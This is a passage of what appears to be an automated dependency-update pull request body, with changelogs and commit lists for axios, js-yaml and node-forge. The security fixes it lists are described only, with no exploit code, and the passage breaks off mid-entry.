href=\"https://redirect.github.com/axios/axios/issues/10688\"\u003e#10688\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003eCI Security:\u003c/strong\u003e SHA-pins all actions and disables credential persistence in v0.x CI, introduces \u003ccode\u003ezizmor\u003c/code\u003e security scanning with SARIF upload to code scanning, adds an OIDC Trusted Publishing workflow with npm provenance attestations, and gates all publishes behind a required \u003ccode\u003enpm-publish\u003c/code\u003e GitHub Environment with configurable reviewer protections. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10638\"\u003e#10638\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10639\"\u003e#10639\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10667\"\u003e#10667\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🐛 Bug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003eTypeScript — \u003ccode\u003eAxiosInstance\u003c/code\u003e Return Types:\u003c/strong\u003e Fixes return types in \u003ccode\u003eAxiosInstance\u003c/code\u003e methods to correctly resolve to \u003ccode\u003ePromise\u0026lt;R\u0026gt;\u003c/code\u003e (matching \u003ccode\u003eAxiosPromise\u0026lt;T\u0026gt;\u003c/code\u003e semantics), and corrects the generic call signature so TypeScript properly enforces the response data type. TypeScript-only changes; no runtime impact. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/6253\"\u003e#6253\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7328\"\u003e#7328\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003ePerformance:\u003c/strong\u003e Fixes a performance regression in \u003ccode\u003eisEmptyObject()\u003c/code\u003e that caused excessive computation when the argument was a large string. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/6484\"\u003e#6484\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔧 Maintenance \u0026amp; Chores\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eVersioning \u0026amp; CI Workflow:\u003c/strong\u003e Adds an automated versioning flow for v0.x, renames the CI workflow for consistency with the v1.x naming convention, and corrects the branch name reference in CI config. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10690\"\u003e#10690\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10691\"\u003e#10691\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10692\"\u003e#10692\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🌟 New Contributors\u003c/h2\u003e\n\u003cp\u003eWe are thrilled to welcome our new contributors. Thank you for helping improve axios:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/nakataki17\"\u003e\u003ccode\u003e@​nakataki17\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/6253\"\u003e#6253\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/gmasclet\"\u003e\u003ccode\u003e@​gmasclet\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/6484\"\u003e#6484\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/shaanmajid\"\u003e\u003ccode\u003e@​shaanmajid\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10638\"\u003e#10638\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10639\"\u003e#10639\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10667\"\u003e#10667\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/ivan-churakov\"\u003e\u003ccode\u003e@​ivan-churakov\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7328\"\u003e#7328\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/axios/axios/compare/v0.30.3...v0.31.0\"\u003eFull Changelog\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eRelease notes - v0.30.3\u003c/h2\u003e\n\u003cp\u003eThis is a critical security maintenance release for the v0.x branch. It addresses a high-priority vulnerability involving prototype pollution that could lead to a Denial of Service (DoS).\u003c/p\u003e\n\u003cp\u003eRecommendation: All users currently on the 0.x release line should upgrade to this version immediately to ensure environment stability.\u003c/p\u003e\n\u003ch2\u003e🛡️ Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBackport: Fix DoS via \u003cstrong\u003eproto\u003c/strong\u003e key in merge config\u003c/strong\u003e\n\u003cul\u003e\n\u003cli\u003ePatched a vulnerability where specifically crafted configuration objects using the \u003cstrong\u003eproto\u003c/strong\u003e key could cause a Denial of Service during the merge process. - \u003cem\u003eby \u003ca href=\"https://github.com/FeBe95\"\u003e\u003ccode\u003e@​FeBe95\u003c/code\u003e\u003c/a\u003e in [PR \u003ca href=\"https://redirect.github.com/axios/axios/issues/7388\"\u003e#7388\u003c/a\u003e](\u003ca href=\"https://redirect.github.com/axios/axios/pull/7388\"\u003eaxios/axios#7388\u003c/a\u003e)\u003c/em\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e⚙️ Maintenance \u0026amp; CI\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eCI Infrastructure Update\u003c/strong\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated Continuous Integration workflows for the v0.x branch to maintain long-term support and build reliability. - \u003cem\u003eby \u003ca href=\"https://github.com/jasonsaayman\"\u003e\u003ccode\u003e@​jasonsaayman\u003c/code\u003e\u003c/a\u003e in [PR \u003ca href=\"https://redirect.github.com/axios/axios/issues/7407\"\u003e#7407\u003c/a\u003e](\u003ca href=\"https://redirect.github.com/axios/axios/pull/7407\"\u003eaxios/axios#7407\u003c/a\u003e)\u003c/em\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e⚠️ Breaking Changes\u003c/h2\u003e\n\u003cp\u003eConfiguration Merging Behavior:\u003c/p\u003e\n\u003cp\u003eAs part of the security fix, Axios now restricts the merging of the \u003cstrong\u003eproto\u003c/strong\u003e key within configuration objects. If your codebase relies on unconventional deep-merging patterns that target the object prototype via Axios config, those operations will now be blocked. This is a necessary change to prevent prototype pollution.\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/5073eca0edd37b13a0e39dcb48794d779b7dff8d\"\u003e\u003ccode\u003e5073eca\u003c/code\u003e\u003c/a\u003e chore: release v0.31.0 (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10697\"\u003e#10697\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/b57eb1a93214c9d6840035add0cc705fa9d6d697\"\u003e\u003ccode\u003eb57eb1a\u003c/code\u003e\u003c/a\u003e ci: update branch name (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10692\"\u003e#10692\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/00ab2af7334d75874605dcd22575673eae638cee\"\u003e\u003ccode\u003e00ab2af\u003c/code\u003e\u003c/a\u003e refactor: change name to have a unified workflow (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10691\"\u003e#10691\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/9a66c090bfd946052afba365d809d0c4fbd13238\"\u003e\u003ccode\u003e9a66c09\u003c/code\u003e\u003c/a\u003e chore: added a versioning flow (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10690\"\u003e#10690\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c\"\u003e\u003ccode\u003e03cdfc9\u003c/code\u003e\u003c/a\u003e fix: backport the fixes from the v1 branch (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10688\"\u003e#10688\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/71be4e5c80769329d7845b36a8d31e4f7f042202\"\u003e\u003ccode\u003e71be4e5\u003c/code\u003e\u003c/a\u003e fix: return types in AxiosInstance methods should be Promise\u0026lt;R\u0026gt; (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6253\"\u003e#6253\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/62610f69ad140784ba8e4dc3c5ebec888b53682b\"\u003e\u003ccode\u003e62610f6\u003c/code\u003e\u003c/a\u003e fix: fixed performance issue in isEmptyObject() (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6484\"\u003e#6484\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/68f97f7588608595c5251d91ce4c895e90a10ae0\"\u003e\u003ccode\u003e68f97f7\u003c/code\u003e\u003c/a\u003e ci: require npm-publish environment for releases (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10667\"\u003e#10667\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/58a604385bf73c5ea19baa2e116de4c63c055852\"\u003e\u003ccode\u003e58a6043\u003c/code\u003e\u003c/a\u003e ci: add zizmor and harden v0.x CI (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10638\"\u003e#10638\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/b560d41ab8e748d766bbd09bc90e6272f2cc535f\"\u003e\u003ccode\u003eb560d41\u003c/code\u003e\u003c/a\u003e ci: add OIDC publish workflow for v0.x (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10639\"\u003e#10639\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/axios/axios/compare/v0.23.0...v0.31.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for axios since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 3.14.1 to 3.14.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[3.14.2] - 2025-11-15\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackported v4.1.1 fix to v3\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.0] - 2021-04-15\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eTypes are now exported as \u003ccode\u003eyaml.types.XXX\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eEvery type now has \u003ccode\u003eoptions\u003c/code\u003e property with original arguments kept as they were\n(see \u003ccode\u003eyaml.types.int.options\u003c/code\u003e as an example).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eSchema.extend()\u003c/code\u003e now keeps old type order in case of conflicts\n(e.g. Schema.extend([ a, b, c ]).extend([ b, a, d ]) is now ordered as \u003ccode\u003eabcd\u003c/code\u003e instead of \u003ccode\u003ecbad\u003c/code\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.0.0] - 2021-01-03\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eCheck \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/migrate_v3_to_v4.md\"\u003emigration guide\u003c/a\u003e to see details for all breaking changes.\u003c/li\u003e\n\u003cli\u003eBreaking: \u0026quot;unsafe\u0026quot; tags \u003ccode\u003e!!js/function\u003c/code\u003e, \u003ccode\u003e!!js/regexp\u003c/code\u003e, \u003ccode\u003e!!js/undefined\u003c/code\u003e are\nmoved to \u003ca href=\"https://github.com/nodeca/js-yaml-js-types\"\u003ejs-yaml-js-types\u003c/a\u003e package.\u003c/li\u003e\n\u003cli\u003eBreaking: removed \u003ccode\u003esafe*\u003c/code\u003e functions. Use \u003ccode\u003eload\u003c/code\u003e, \u003ccode\u003eloadAll\u003c/code\u003e, \u003ccode\u003edump\u003c/code\u003e\ninstead which are all now safe by default.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.DEFAULT_SAFE_SCHEMA\u003c/code\u003e and \u003ccode\u003eyaml.DEFAULT_FULL_SCHEMA\u003c/code\u003e are removed, use\n\u003ccode\u003eyaml.DEFAULT_SCHEMA\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.Schema.create(schema, tags)\u003c/code\u003e is removed, use \u003ccode\u003eschema.extend(tags)\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e!!binary\u003c/code\u003e now always mapped to \u003ccode\u003eUint8Array\u003c/code\u003e on load.\u003c/li\u003e\n\u003cli\u003eReduced nesting of \u003ccode\u003e/lib\u003c/code\u003e folder.\u003c/li\u003e\n\u003cli\u003eParse numbers according to YAML 1.2 instead of YAML 1.1 (\u003ccode\u003e01234\u003c/code\u003e is now decimal,\n\u003ccode\u003e0o1234\u003c/code\u003e is octal, \u003ccode\u003e1:23\u003c/code\u003e is parsed as string instead of base60).\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e no longer quotes \u003ccode\u003e:\u003c/code\u003e, \u003ccode\u003e[\u003c/code\u003e, \u003ccode\u003e]\u003c/code\u003e, \u003ccode\u003e(\u003c/code\u003e, \u003ccode\u003e)\u003c/code\u003e except when necessary, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/470\"\u003e#470\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/557\"\u003e#557\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eLine and column in exceptions are now formatted as \u003ccode\u003e(X:Y)\u003c/code\u003e instead of\n\u003ccode\u003eat line X, column Y\u003c/code\u003e (also present in compact format), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/332\"\u003e#332\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCode snippet created in exceptions now contains multiple lines with line numbers.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e now serializes \u003ccode\u003eundefined\u003c/code\u003e as \u003ccode\u003enull\u003c/code\u003e in collections and removes keys with\n\u003ccode\u003eundefined\u003c/code\u003e in mappings, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/571\"\u003e#571\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e with \u003ccode\u003eskipInvalid=true\u003c/code\u003e now serializes invalid items in collections as null.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003e!\u003c/code\u003e are now dumped as \u003ccode\u003e!tag\u003c/code\u003e instead of \u003ccode\u003e!\u0026lt;!tag\u0026gt;\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/576\"\u003e#576\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003etag:yaml.org,2002:\u003c/code\u003e are now shorthanded using \u003ccode\u003e!!\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/258\"\u003e#258\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003e.mjs\u003c/code\u003e (es modules) support.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003equotingType\u003c/code\u003e and \u003ccode\u003eforceQuotes\u003c/code\u003e options for dumper to configure\nstring literal style, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/290\"\u003e#290\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/529\"\u003e#529\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003estyles: { '!!null': 'empty' }\u003c/code\u003e option for dumper\n(serializes \u003ccode\u003e{ foo: null }\u003c/code\u003e as \u0026quot;\u003ccode\u003efoo: \u003c/code\u003e\u0026quot;), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/570\"\u003e#570\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/9963d366dfbde0c69722452bcd40b41e7e4160a0\"\u003e\u003ccode\u003e9963d36\u003c/code\u003e\u003c/a\u003e 3.14.2 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/10d3c8e70a6888543f5cdb656bb39f73e0ea77c1\"\u003e\u003ccode\u003e10d3c8e\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/5278870a17454fe8621dbd8c445c412529525266\"\u003e\u003ccode\u003e5278870\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;) (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/731\"\u003e#731\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/3.14.1...3.14.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 4.1.0 to 4.1.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[3.14.2] - 2025-11-15\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackported v4.1.1 fix to v3\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.0] - 2021-04-15\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eTypes are now exported as \u003ccode\u003eyaml.types.XXX\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eEvery type now has \u003ccode\u003eoptions\u003c/code\u003e property with original arguments kept as they were\n(see \u003ccode\u003eyaml.types.int.options\u003c/code\u003e as an example).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eSchema.extend()\u003c/code\u003e now keeps old type order in case of conflicts\n(e.g. Schema.extend([ a, b, c ]).extend([ b, a, d ]) is now ordered as \u003ccode\u003eabcd\u003c/code\u003e instead of \u003ccode\u003ecbad\u003c/code\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.0.0] - 2021-01-03\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eCheck \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/migrate_v3_to_v4.md\"\u003emigration guide\u003c/a\u003e to see details for all breaking changes.\u003c/li\u003e\n\u003cli\u003eBreaking: \u0026quot;unsafe\u0026quot; tags \u003ccode\u003e!!js/function\u003c/code\u003e, \u003ccode\u003e!!js/regexp\u003c/code\u003e, \u003ccode\u003e!!js/undefined\u003c/code\u003e are\nmoved to \u003ca href=\"https://github.com/nodeca/js-yaml-js-types\"\u003ejs-yaml-js-types\u003c/a\u003e package.\u003c/li\u003e\n\u003cli\u003eBreaking: removed \u003ccode\u003esafe*\u003c/code\u003e functions. Use \u003ccode\u003eload\u003c/code\u003e, \u003ccode\u003eloadAll\u003c/code\u003e, \u003ccode\u003edump\u003c/code\u003e\ninstead which are all now safe by default.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.DEFAULT_SAFE_SCHEMA\u003c/code\u003e and \u003ccode\u003eyaml.DEFAULT_FULL_SCHEMA\u003c/code\u003e are removed, use\n\u003ccode\u003eyaml.DEFAULT_SCHEMA\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.Schema.create(schema, tags)\u003c/code\u003e is removed, use \u003ccode\u003eschema.extend(tags)\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e!!binary\u003c/code\u003e now always mapped to \u003ccode\u003eUint8Array\u003c/code\u003e on load.\u003c/li\u003e\n\u003cli\u003eReduced nesting of \u003ccode\u003e/lib\u003c/code\u003e folder.\u003c/li\u003e\n\u003cli\u003eParse numbers according to YAML 1.2 instead of YAML 1.1 (\u003ccode\u003e01234\u003c/code\u003e is now decimal,\n\u003ccode\u003e0o1234\u003c/code\u003e is octal, \u003ccode\u003e1:23\u003c/code\u003e is parsed as string instead of base60).\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e no longer quotes \u003ccode\u003e:\u003c/code\u003e, \u003ccode\u003e[\u003c/code\u003e, \u003ccode\u003e]\u003c/code\u003e, \u003ccode\u003e(\u003c/code\u003e, \u003ccode\u003e)\u003c/code\u003e except when necessary, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/470\"\u003e#470\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/557\"\u003e#557\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eLine and column in exceptions are now formatted as \u003ccode\u003e(X:Y)\u003c/code\u003e instead of\n\u003ccode\u003eat line X, column Y\u003c/code\u003e (also present in compact format), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/332\"\u003e#332\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCode snippet created in exceptions now contains multiple lines with line numbers.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e now serializes \u003ccode\u003eundefined\u003c/code\u003e as \u003ccode\u003enull\u003c/code\u003e in collections and removes keys with\n\u003ccode\u003eundefined\u003c/code\u003e in mappings, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/571\"\u003e#571\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e with \u003ccode\u003eskipInvalid=true\u003c/code\u003e now serializes invalid items in collections as null.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003e!\u003c/code\u003e are now dumped as \u003ccode\u003e!tag\u003c/code\u003e instead of \u003ccode\u003e!\u0026lt;!tag\u0026gt;\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/576\"\u003e#576\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003etag:yaml.org,2002:\u003c/code\u003e are now shorthanded using \u003ccode\u003e!!\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/258\"\u003e#258\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003e.mjs\u003c/code\u003e (es modules) support.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003equotingType\u003c/code\u003e and \u003ccode\u003eforceQuotes\u003c/code\u003e options for dumper to configure\nstring literal style, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/290\"\u003e#290\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/529\"\u003e#529\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003estyles: { '!!null': 'empty' }\u003c/code\u003e option for dumper\n(serializes \u003ccode\u003e{ foo: null }\u003c/code\u003e as \u0026quot;\u003ccode\u003efoo: \u003c/code\u003e\u0026quot;), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/570\"\u003e#570\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/9963d366dfbde0c69722452bcd40b41e7e4160a0\"\u003e\u003ccode\u003e9963d36\u003c/code\u003e\u003c/a\u003e 3.14.2 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/10d3c8e70a6888543f5cdb656bb39f73e0ea77c1\"\u003e\u003ccode\u003e10d3c8e\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/5278870a17454fe8621dbd8c445c412529525266\"\u003e\u003ccode\u003e5278870\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;) (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/731\"\u003e#731\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/3.14.1...3.14.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `node-forge` from 1.3.0 to 1.4.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/digitalbazaar/forge/blob/main/CHANGELOG.md\"\u003enode-forge's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e1.4.0 - 2026-03-24\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eHIGH\u003c/strong\u003e: Denial of Service in \u003ccode\u003eBigInteger.modInverse()\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003eA Denial of Service (DoS) vulnerability exists due to an infinite loop in\nthe \u003ccode\u003eBigInteger.modInverse()\u003c/code\u003e function (inherited from the bundled jsbn\nlibrary). When \u003ccode\u003emodInverse()\u003c/code\u003e is called with a zero value as input, the\ninternal Extended Euclidean Algorithm enters an unreachable exit condition,\ncausing the process to hang indefinitely and consume 100% 